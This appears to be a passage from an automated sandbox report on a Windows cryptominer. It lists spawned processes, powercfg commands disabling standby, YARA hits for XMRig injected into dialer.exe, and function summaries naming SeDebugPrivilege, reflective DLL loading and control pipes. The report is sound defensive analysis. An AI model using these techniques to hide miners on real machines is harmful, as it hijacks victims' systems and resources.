                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Has exited:true

                                                            Target ID:56
                                                            Start time:04:37:08
                                                            Start date:05/11/2024
                                                            Path:C:\Windows\System32\conhost.exe
                                                            Wow64 process (32bit):false
                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                            Imagebase:0x7ff7699e0000
                                                            File size:862'208 bytes
                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Has exited:true

                                                            Target ID:57
                                                            Start time:04:37:08
                                                            Start date:05/11/2024
                                                            Path:C:\Windows\System32\powercfg.exe
                                                            Wow64 process (32bit):false
                                                            Commandline:C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0
                                                            Imagebase:0x7ff73d0e0000
                                                            File size:96'256 bytes
                                                            MD5 hash:9CA38BE255FFF57A92BD6FBF8052B705
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Has exited:true

                                                            Target ID:58
                                                            Start time:04:37:08
                                                            Start date:05/11/2024
                                                            Path:C:\Windows\System32\conhost.exe
                                                            Wow64 process (32bit):false
                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                            Imagebase:0x7ff7699e0000
                                                            File size:862'208 bytes
                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Has exited:true

                                                            Target ID:59
                                                            Start time:04:37:08
                                                            Start date:05/11/2024
                                                            Path:C:\Windows\System32\powercfg.exe
                                                            Wow64 process (32bit):false
                                                            Commandline:C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0
                                                            Imagebase:0x7ff73d0e0000
                                                            File size:96'256 bytes
                                                            MD5 hash:9CA38BE255FFF57A92BD6FBF8052B705
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Has exited:true

                                                            Target ID:60
                                                            Start time:04:37:08
                                                            Start date:05/11/2024
                                                            Path:C:\Windows\System32\conhost.exe
                                                            Wow64 process (32bit):false
                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                            Imagebase:0x7ff7699e0000
                                                            File size:862'208 bytes
                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Has exited:true

                                                            Target ID:61
                                                            Start time:04:37:08
                                                            Start date:05/11/2024
                                                            Path:C:\Windows\System32\conhost.exe
                                                            Wow64 process (32bit):false
                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                            Imagebase:0x7ff7699e0000
                                                            File size:862'208 bytes
                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Has exited:true

                                                            Target ID:62
                                                            Start time:04:37:08
                                                            Start date:05/11/2024
                                                            Path:C:\Windows\System32\dialer.exe
                                                            Wow64 process (32bit):false
                                                            Commandline:C:\Windows\system32\dialer.exe
                                                            Imagebase:0x7ff691a50000
                                                            File size:39'936 bytes
                                                            MD5 hash:B2626BDCF079C6516FC016AC5646DF93
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Has exited:false

                                                            Target ID:63
                                                            Start time:04:37:08
                                                            Start date:05/11/2024
                                                            Path:C:\Windows\System32\dialer.exe
                                                            Wow64 process (32bit):false
                                                            Commandline:C:\Windows\system32\dialer.exe
                                                            Imagebase:0x7ff691a50000
                                                            File size:39'936 bytes
                                                            MD5 hash:B2626BDCF079C6516FC016AC5646DF93
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Has exited:false

                                                            Target ID:64
                                                            Start time:04:37:08
                                                            Start date:05/11/2024
                                                            Path:C:\Windows\System32\dialer.exe
                                                            Wow64 process (32bit):false
                                                            Commandline:dialer.exe
                                                            Imagebase:0x7ff691a50000
                                                            File size:39'936 bytes
                                                            MD5 hash:B2626BDCF079C6516FC016AC5646DF93
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Yara matches:
                                                            • Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 00000040.00000002.3074015557.000001AC03840000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                            • Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 00000040.00000002.3074015557.000001AC037E9000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                            • Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 00000040.00000002.3066852301.0000000140001000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                            • Rule: MacOS_Cryptominer_Xmrig_241780a1, Description: unknown, Source: 00000040.00000002.3066852301.0000000140001000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
                                                            Has exited:false

                                                            Target ID:65
                                                            Start time:04:37:08
                                                            Start date:05/11/2024
                                                            Path:C:\Windows\System32\svchost.exe
                                                            Wow64 process (32bit):false
                                                            Commandline:C:\Windows\system32\svchost.exe -k netsvcs -p -s gpsvc
                                                            Imagebase:0x7ff6eef20000
                                                            File size:55'320 bytes
                                                            MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Has exited:false

                                                            Target ID:66
                                                            Start time:04:37:09
                                                            Start date:05/11/2024
                                                            Path:C:\Windows\System32\svchost.exe
                                                            Wow64 process (32bit):false
                                                            Commandline:C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s lmhosts
                                                            Imagebase:0x7ff6eef20000
                                                            File size:55'320 bytes
                                                            MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                                            Has elevated privileges:false
                                                            Has administrator privileges:false
                                                            Programmed in:C, C++ or other language
                                                            Has exited:false

                                                            Target ID:67
                                                            Start time:04:37:09
                                                            Start date:05/11/2024
                                                            Path:C:\Windows\System32\svchost.exe
                                                            Wow64 process (32bit):false
                                                            Commandline:C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s NcbService
                                                            Imagebase:0x7ff6eef20000
                                                            File size:55'320 bytes
                                                            MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Has exited:false

                                                            Target ID:68
                                                            Start time:04:37:09
                                                            Start date:05/11/2024
                                                            Path:C:\Windows\System32\svchost.exe
                                                            Wow64 process (32bit):false
                                                            Commandline:C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s TimeBrokerSvc
                                                            Imagebase:0x7ff6eef20000
                                                            File size:55'320 bytes
                                                            MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                                            Has elevated privileges:false
                                                            Has administrator privileges:false
                                                            Programmed in:C, C++ or other language
                                                            Has exited:false

                                                            Target ID:69
                                                            Start time:04:37:09
                                                            Start date:05/11/2024
                                                            Path:C:\Windows\System32\svchost.exe
                                                            Wow64 process (32bit):false
                                                            Commandline:C:\Windows\system32\svchost.exe -k netsvcs -p -s Schedule
                                                            Imagebase:0x7ff6eef20000
                                                            File size:55'320 bytes
                                                            MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Has exited:false

                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1734386086.00007FF6CC421000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6CC420000, based on PE: true
                                                              • Associated: 00000000.00000002.1734356130.00007FF6CC420000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1734436298.00007FF6CC434000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1734501457.00007FF6CC438000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1734556728.00007FF6CC439000.00000008.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1735049508.00007FF6CC92D000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1735096183.00007FF6CC966000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1735114856.00007FF6CC969000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_7ff6cc420000_file.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 468899d511a3580b8016a16ee82124799021391b29db4fe74c236ec62e562d6c
                                                              • Instruction ID: 239ace28db30927a1bd5b1008f8730c317be793e27ed34d0f15ba748288e156f
                                                              • Opcode Fuzzy Hash: 468899d511a3580b8016a16ee82124799021391b29db4fe74c236ec62e562d6c
                                                              • Instruction Fuzzy Hash: 22B01230E043C9C4E3002F01E8423A836706B4C747F40D030C54CC3792CE7D58404B10

                                                              Execution Graph

                                                              Execution Coverage:46.1%
                                                              Dynamic/Decrypted Code Coverage:0%
                                                              Signature Coverage:67%
                                                              Total number of Nodes:227
                                                              Total number of Limit Nodes:24
                                                              Control-flow Graph

                                                              Memory Dump Source
                                                              • Source File: 00000019.00000002.1774838193.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                                              • Associated: 00000019.00000002.1774805532.0000000140000000.00000004.00000001.00020000.00000000.sdmp
                                                              • Associated: 00000019.00000002.1774869042.0000000140003000.00000002.00000001.00020000.00000000.sdmp
                                                              • Associated: 00000019.00000002.1774907907.0000000140006000.00000002.00000001.00020000.00000000.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_25_2_140000000_dialer.jbxd
                                                              Similarity
                                                              • API ID: CreateProcess$Close$CurrentHandleResource$FileSecurityThread$DescriptorFreeHeapModuleOpenProtectTokenValueVirtual$AdjustAllocConvertErrorFindInformationLastLibraryLoadLocalLockLookupMappingPrivilegePrivilegesSizeofSleepStringViewlstrcmpi
                                                              • String ID: D:(A;OICI;GA;;;AU)(A;OICI;GA;;;BA)$DLL$SOFTWARE\dialerconfig$SeDebugPrivilege$kernel32.dll$ntdll.dll$pid$svc64
                                                              • API String ID: 4177739653-1130149537
                                                              • Opcode ID: d90b24f95a95c841a2e029a5b4d6274d008a65fb61feaf57b7d2a555975f1ca1
                                                              • Instruction ID: c2e61514e361dd61edc66d1a85693de1d2c237bf329a5b31df93bef4cff25afe
                                                              • Opcode Fuzzy Hash: d90b24f95a95c841a2e029a5b4d6274d008a65fb61feaf57b7d2a555975f1ca1
                                                              • Instruction Fuzzy Hash: B781E4B6200B4196EB26CF62F8547D977A9F78CBD8F44512AEB4A43A78DF38C148C740

                                                              Control-flow Graph

                                                              Memory Dump Source
                                                              • Source File: 00000019.00000002.1774838193.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                                              • Associated: 00000019.00000002.1774805532.0000000140000000.00000004.00000001.00020000.00000000.sdmp
                                                              • Associated: 00000019.00000002.1774869042.0000000140003000.00000002.00000001.00020000.00000000.sdmp
                                                              • Associated: 00000019.00000002.1774907907.0000000140006000.00000002.00000001.00020000.00000000.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_25_2_140000000_dialer.jbxd
                                                              Similarity
                                                              • API ID: Process$CloseHandle$Open$InformationToken$AllocAuthorityFileLocalName$CodeCountErrorExitFindFreeLastMemoryModuleObjectPathQuerySingleThreadVirtualWaitWow64Writelstrlen
                                                              • String ID: @$MSBuild.exe$ReflectiveDllMain$dialer.exe
                                                              • API String ID: 2561231171-3753927220
                                                              • Opcode ID: 0577da8a6dab89cee6e9ad54b472e69925a8a9fa9a84297e512ce95199d2773e
                                                              • Instruction ID: 2175fd9260984ecd3e092ef955109d5d50fbfcc0bf213717558b1eb8b1c9701c
                                                              • Opcode Fuzzy Hash: 0577da8a6dab89cee6e9ad54b472e69925a8a9fa9a84297e512ce95199d2773e
                                                              • Instruction Fuzzy Hash: 40B138B260468186EB26DF27F8947E927A9FB8CBC4F404125AF4A477B4EF38C645C740

                                                              Control-flow Graph

                                                              Memory Dump Source
                                                              • Source File: 00000019.00000002.1774838193.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                                              • Associated: 00000019.00000002.1774805532.0000000140000000.00000004.00000001.00020000.00000000.sdmp
                                                              • Associated: 00000019.00000002.1774869042.0000000140003000.00000002.00000001.00020000.00000000.sdmp
                                                              • Associated: 00000019.00000002.1774907907.0000000140006000.00000002.00000001.00020000.00000000.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_25_2_140000000_dialer.jbxd
                                                              Similarity
                                                              • API ID: Heap$Process$AllocEnumFree$CloseHandleMemoryModulesOpenProcessesRead
                                                              • String ID:
                                                              • API String ID: 4084875642-0
                                                              • Opcode ID: 3ba232721d1513b5cedada72c6e24bd118260bd52d62463099d565cdd5ea385d
                                                              • Instruction ID: 4858e5a3d965c592fcd1f5951e26bd94c88d4916acf90710a0b336d1aa1e032e
                                                              • Opcode Fuzzy Hash: 3ba232721d1513b5cedada72c6e24bd118260bd52d62463099d565cdd5ea385d
                                                              • Instruction Fuzzy Hash: E6519DB2711A819AEB66CF63E8587EA22A5F78DBC4F444025EF4947764DF38C545C700

                                                              Control-flow Graph

                                                              Memory Dump Source
                                                              • Source File: 00000019.00000002.1774838193.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                                              • Associated: 00000019.00000002.1774805532.0000000140000000.00000004.00000001.00020000.00000000.sdmp
                                                              • Associated: 00000019.00000002.1774869042.0000000140003000.00000002.00000001.00020000.00000000.sdmp
                                                              • Associated: 00000019.00000002.1774907907.0000000140006000.00000002.00000001.00020000.00000000.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_25_2_140000000_dialer.jbxd
                                                              Similarity
                                                              • API ID: DescriptorInitializeSecurity$AllocAllocateCreateDaclEntriesLocalNamedPipe
                                                              • String ID:
                                                              • API String ID: 3197395349-0
                                                              • Opcode ID: 488be1c38cf594ed0d3f6a94cbc7f0150440055c9cb1e58666deddfd8d25be8b
                                                              • Instruction ID: 21eaad2a8fcaa81d39f01622d1c01d05a8059e075f91819b3ade9b41c51f013a
                                                              • Opcode Fuzzy Hash: 488be1c38cf594ed0d3f6a94cbc7f0150440055c9cb1e58666deddfd8d25be8b
                                                              • Instruction Fuzzy Hash: FA318D72215691CAE761CF25F490BDE77A5F748B98F40521AFB4947FA8EB78C208CB40

                                                              Control-flow Graph

                                                              APIs
                                                              • GetProcessHeap.KERNEL32(?,00000000,?,000000014000238B,?,?,?,?,?,?,?,?,?,?,?,0000000140002261), ref: 0000000140001801
                                                              • HeapAlloc.KERNEL32(?,00000000,?,000000014000238B,?,?,?,?,?,?,?,?,?,?,?,0000000140002261), ref: 0000000140001812
                                                                • Part of subcall function 00000001400014D8: GetProcessHeap.KERNEL32 ref: 000000014000150B
                                                                • Part of subcall function 00000001400014D8: HeapAlloc.KERNEL32 ref: 000000014000151E
                                                                • Part of subcall function 00000001400014D8: GetProcessHeap.KERNEL32 ref: 000000014000152C
                                                                • Part of subcall function 00000001400014D8: HeapAlloc.KERNEL32 ref: 000000014000153D
                                                                • Part of subcall function 00000001400014D8: K32EnumProcesses.KERNEL32 ref: 0000000140001557
                                                                • Part of subcall function 00000001400014D8: OpenProcess.KERNEL32 ref: 0000000140001585
                                                                • Part of subcall function 00000001400014D8: K32EnumProcessModules.KERNEL32 ref: 00000001400015AA
                                                                • Part of subcall function 00000001400014D8: ReadProcessMemory.KERNELBASE ref: 00000001400015E1
                                                                • Part of subcall function 00000001400014D8: CloseHandle.KERNELBASE ref: 000000014000161D
                                                                • Part of subcall function 00000001400014D8: GetProcessHeap.KERNEL32 ref: 000000014000162F
                                                                • Part of subcall function 00000001400014D8: RtlFreeHeap.NTDLL ref: 000000014000163D
                                                                • Part of subcall function 00000001400014D8: GetProcessHeap.KERNEL32 ref: 0000000140001643
                                                                • Part of subcall function 00000001400014D8: RtlFreeHeap.NTDLL ref: 0000000140001651
                                                              • OpenProcess.KERNEL32 ref: 0000000140001859
                                                              • TerminateProcess.KERNEL32 ref: 000000014000186C
                                                              • CloseHandle.KERNEL32 ref: 0000000140001875
                                                              • GetProcessHeap.KERNEL32 ref: 0000000140001885
                                                              Memory Dump Source
                                                              • Source File: 00000019.00000002.1774838193.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                                              • Associated: 00000019.00000002.1774805532.0000000140000000.00000004.00000001.00020000.00000000.sdmp
                                                              • Associated: 00000019.00000002.1774869042.0000000140003000.00000002.00000001.00020000.00000000.sdmp
                                                              • Associated: 00000019.00000002.1774907907.0000000140006000.00000002.00000001.00020000.00000000.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_25_2_140000000_dialer.jbxd
                                                              Similarity
                                                              • API ID: HeapProcess$Alloc$CloseEnumFreeHandleOpen$MemoryModulesProcessesReadTerminate
                                                              • String ID:
                                                              • API String ID: 1323846700-0
                                                              • Opcode ID: 292de27f87d02887c134cd68883e15ba7f6a186f84d3e8f804eb1f1d2b0452f5
                                                              • Instruction ID: e8e8f15008253283e0d5a10c8ea57e573901c1344bffe788f1ea91b5e390c365
                                                              • Opcode Fuzzy Hash: 292de27f87d02887c134cd68883e15ba7f6a186f84d3e8f804eb1f1d2b0452f5
                                                              • Instruction Fuzzy Hash: C8115BB1B05A4186FB1ADF27F8443D966A6ABCDBC4F188038EF09037B5DE38C5868700

                                                              Control-flow Graph

                                                              Memory Dump Source
                                                              • Source File: 00000019.00000002.1774838193.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                                              • Associated: 00000019.00000002.1774805532.0000000140000000.00000004.00000001.00020000.00000000.sdmp
                                                              • Associated: 00000019.00000002.1774869042.0000000140003000.00000002.00000001.00020000.00000000.sdmp
                                                              • Associated: 00000019.00000002.1774907907.0000000140006000.00000002.00000001.00020000.00000000.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_25_2_140000000_dialer.jbxd
                                                              Similarity
                                                              • API ID: FileHandle$CloseCreateModuleProtectVirtual$CurrentFreeInformationLibraryMappingProcessViewlstrcmpi
                                                              • String ID: .text$C:\Windows\System32\
                                                              • API String ID: 2721474350-832442975
                                                              • Opcode ID: ea51ffa9aeaeb0e2cf226d8574d2fabd87300f6e212f2c78447215b36c46b769
                                                              • Instruction ID: 0b364bd3c89a37fdd3fa7b369e4888cbeb1e5b170dc00cf86e963973e9165d3d
                                                              • Opcode Fuzzy Hash: ea51ffa9aeaeb0e2cf226d8574d2fabd87300f6e212f2c78447215b36c46b769
                                                              • Instruction Fuzzy Hash: CC518BB2204B8096EB62CF16F8587DAB3A5F78CBD4F444525AF4A03B68DF38C549C700

                                                              Control-flow Graph

                                                              Memory Dump Source
                                                              • Source File: 00000019.00000002.1774838193.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                                              • Associated: 00000019.00000002.1774805532.0000000140000000.00000004.00000001.00020000.00000000.sdmp
                                                              • Associated: 00000019.00000002.1774869042.0000000140003000.00000002.00000001.00020000.00000000.sdmp
                                                              • Associated: 00000019.00000002.1774907907.0000000140006000.00000002.00000001.00020000.00000000.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_25_2_140000000_dialer.jbxd
                                                              Similarity
                                                              • API ID: NamedPipe$DescriptorFileInitializeSecuritySleep$AllocAllocateConnectCreateDaclDisconnectEntriesLocalReadWrite
                                                              • String ID: M$\\.\pipe\dialerchildproc64
                                                              • API String ID: 2203880229-3489460547
                                                              • Opcode ID: cb78decc689e444f168c8ecd1fa7ab696948f8a3ff5b9be1a13ae3c23ba91d6c
                                                              • Instruction ID: 6dc3dc8c0bd617ca7cbe615ebfcb02ed857a87361961821bc60a1768ee808972
                                                              • Opcode Fuzzy Hash: cb78decc689e444f168c8ecd1fa7ab696948f8a3ff5b9be1a13ae3c23ba91d6c
                                                              • Instruction Fuzzy Hash: C01139B1218A8492F716DB22F8047EE6764A78DBE0F444225BB66036F4DF7CC548C700

                                                              Control-flow Graph

                                                              Memory Dump Source
                                                              • Source File: 00000019.00000002.1774838193.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                                              • Associated: 00000019.00000002.1774805532.0000000140000000.00000004.00000001.00020000.00000000.sdmp
                                                              • Associated: 00000019.00000002.1774869042.0000000140003000.00000002.00000001.00020000.00000000.sdmp
                                                              • Associated: 00000019.00000002.1774907907.0000000140006000.00000002.00000001.00020000.00000000.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_25_2_140000000_dialer.jbxd
                                                              Similarity
                                                              • API ID: NamedPipe$DescriptorInitializeSecuritySleep$AllocAllocateConnectCreateDaclDisconnectEntriesFileLocalRead
                                                              • String ID: \\.\pipe\dialercontrol_redirect64
                                                              • API String ID: 2071455217-3440882674
                                                              • Opcode ID: 0eadeefac485689016ee7cb8901f6413b977b23d4cbf2cacf1e5db6f82192be8
                                                              • Instruction ID: d66e41e89491d3fe39127ed5f8ff24c46c9ecc4af95d447005e5476a51c55f6d
                                                              • Opcode Fuzzy Hash: 0eadeefac485689016ee7cb8901f6413b977b23d4cbf2cacf1e5db6f82192be8
                                                              • Instruction Fuzzy Hash: 42014BB1204A40A2EA17EB63F8443E9B365A79DBE0F144235FB66476F4DF78C488C700

                                                              Control-flow Graph

                                                              Memory Dump Source
                                                              • Source File: 00000019.00000002.1774838193.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                                              • Associated: 00000019.00000002.1774805532.0000000140000000.00000004.00000001.00020000.00000000.sdmp
                                                              • Associated: 00000019.00000002.1774869042.0000000140003000.00000002.00000001.00020000.00000000.sdmp
                                                              • Associated: 00000019.00000002.1774907907.0000000140006000.00000002.00000001.00020000.00000000.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_25_2_140000000_dialer.jbxd
                                                              Similarity
                                                              • API ID: Heap$AllocProcess$EnumProcessesSleep
                                                              • String ID:
                                                              • API String ID: 3676546796-0
                                                              • Opcode ID: 8f13c2487408d17cabd0d6010e800d760c40d8336c2ba260ca50616313c4bb70
                                                              • Instruction ID: 9c67988e037e7d22bad9650836966df18df348572cafe7f0e6f30b42da554bff
                                                              • Opcode Fuzzy Hash: 8f13c2487408d17cabd0d6010e800d760c40d8336c2ba260ca50616313c4bb70
                                                              • Instruction Fuzzy Hash: 3A115CB26006518AE72ACF17F85579A77A6F78DBC1F154028EB4607B68CF39D881CB40

                                                              Control-flow Graph

                                                              Memory Dump Source
                                                              • Source File: 00000019.00000002.1774838193.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                                              • Associated: 00000019.00000002.1774805532.0000000140000000.00000004.00000001.00020000.00000000.sdmp
                                                              • Associated: 00000019.00000002.1774869042.0000000140003000.00000002.00000001.00020000.00000000.sdmp
                                                              • Associated: 00000019.00000002.1774907907.0000000140006000.00000002.00000001.00020000.00000000.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_25_2_140000000_dialer.jbxd
                                                              Similarity
                                                              • API ID: Process$CloseHandleOpenWow64
                                                              • String ID:
                                                              • API String ID: 10462204-0
                                                              • Opcode ID: 6d646fbe37808f9b584e9cbd293ea6613d1d1a58a609fbda32c726050c0f507a
                                                              • Instruction ID: a864651f2e5c17a125c4a55b2f5ca9b47fcd1256b8d640ad9fe9232b2a40a049
                                                              • Opcode Fuzzy Hash: 6d646fbe37808f9b584e9cbd293ea6613d1d1a58a609fbda32c726050c0f507a
                                                              • Instruction Fuzzy Hash: 77F01D7170578192EB56CF17B584399A665E78CBC0F449039EB8943768DF39C4858700

                                                              Control-flow Graph

                                                              APIs
                                                                • Part of subcall function 000000014000226C: GetCurrentProcessId.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,0000000140002261), ref: 000000014000228F
                                                                • Part of subcall function 000000014000226C: OpenProcess.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,0000000140002261), ref: 000000014000229F
                                                                • Part of subcall function 000000014000226C: OpenProcessToken.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,0000000140002261), ref: 00000001400022B9
                                                                • Part of subcall function 000000014000226C: LookupPrivilegeValueW.ADVAPI32 ref: 00000001400022D0
                                                                • Part of subcall function 000000014000226C: AdjustTokenPrivileges.KERNELBASE ref: 0000000140002308
                                                                • Part of subcall function 000000014000226C: GetLastError.KERNEL32 ref: 0000000140002312
                                                                • Part of subcall function 000000014000226C: CloseHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,?,0000000140002261), ref: 000000014000231B
                                                                • Part of subcall function 000000014000226C: FindResourceExA.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,0000000140002261), ref: 000000014000232F
                                                                • Part of subcall function 000000014000226C: SizeofResource.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,0000000140002261), ref: 0000000140002346
                                                                • Part of subcall function 000000014000226C: LoadResource.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,0000000140002261), ref: 000000014000235F
                                                                • Part of subcall function 000000014000226C: LockResource.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,0000000140002261), ref: 0000000140002371
                                                                • Part of subcall function 000000014000226C: GetCurrentProcessId.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,0000000140002261), ref: 000000014000237E
                                                                • Part of subcall function 000000014000226C: RegCreateKeyExW.KERNELBASE ref: 00000001400023BE
                                                                • Part of subcall function 000000014000226C: ConvertStringSecurityDescriptorToSecurityDescriptorW.ADVAPI32 ref: 00000001400023E5
                                                                • Part of subcall function 000000014000226C: RegSetKeySecurity.KERNELBASE ref: 00000001400023FE
                                                                • Part of subcall function 000000014000226C: LocalFree.KERNEL32 ref: 0000000140002408
                                                              • ExitProcess.KERNEL32 ref: 0000000140002263
                                                              Memory Dump Source
                                                              • Source File: 00000019.00000002.1774838193.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                                              • Associated: 00000019.00000002.1774805532.0000000140000000.00000004.00000001.00020000.00000000.sdmp
                                                              • Associated: 00000019.00000002.1774869042.0000000140003000.00000002.00000001.00020000.00000000.sdmp
                                                              • Associated: 00000019.00000002.1774907907.0000000140006000.00000002.00000001.00020000.00000000.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_25_2_140000000_dialer.jbxd
                                                              Similarity
                                                              • API ID: Process$Resource$Security$CurrentDescriptorOpenToken$AdjustCloseConvertCreateErrorExitFindFreeHandleLastLoadLocalLockLookupPrivilegePrivilegesSizeofStringValue
                                                              • String ID:
                                                              • API String ID: 3836936051-0
                                                              • Opcode ID: c7c2c95b7158c919dbdf86fa47620a0d13b0befc2d5611a3b20bc48f104c5c5f
                                                              • Instruction ID: 542f07df19912b07f19d0c3647b83d0aa38d4f887fbb8c9b09a79fc57a6ac5cd
                                                              • Opcode Fuzzy Hash: c7c2c95b7158c919dbdf86fa47620a0d13b0befc2d5611a3b20bc48f104c5c5f
                                                              • Instruction Fuzzy Hash: 84A002B1F1794096FA0BB7F7785E3DC21656B9CB82F500415B242472B2DD3C44558716

                                                              Control-flow Graph

                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000019.00000002.1774838193.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                                              • Associated: 00000019.00000002.1774805532.0000000140000000.00000004.00000001.00020000.00000000.sdmp
                                                              • Associated: 00000019.00000002.1774869042.0000000140003000.00000002.00000001.00020000.00000000.sdmp
                                                              • Associated: 00000019.00000002.1774907907.0000000140006000.00000002.00000001.00020000.00000000.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_25_2_140000000_dialer.jbxd
                                                              Similarity
                                                              • API ID: Process$Open$File$CloseExitHandleHeapName$AllocDeleteEnumFindInformationModulePathProcessesQueryReadTokenValueWow64lstrlen
                                                              • String ID: SOFTWARE$dialerstager$open
                                                              • API String ID: 3276259517-3931493855
                                                              • Opcode ID: 3c799c4d4b717077f969037001029e391788172767dfb7e3a3364a0c1608c947
                                                              • Instruction ID: ae65b9042581f7dc9e2ee581e3d1b52dcddb088aa692a5b8ad70e1a65f9de3a1
                                                              • Opcode Fuzzy Hash: 3c799c4d4b717077f969037001029e391788172767dfb7e3a3364a0c1608c947
                                                              • Instruction Fuzzy Hash: 91D14DB13046818BEB7BDF26B8143E92269F74DBC8F404125BB4A47AB9DE78C605C741

                                                              Control-flow Graph

                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000019.00000002.1774838193.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                                              • Associated: 00000019.00000002.1774805532.0000000140000000.00000004.00000001.00020000.00000000.sdmp
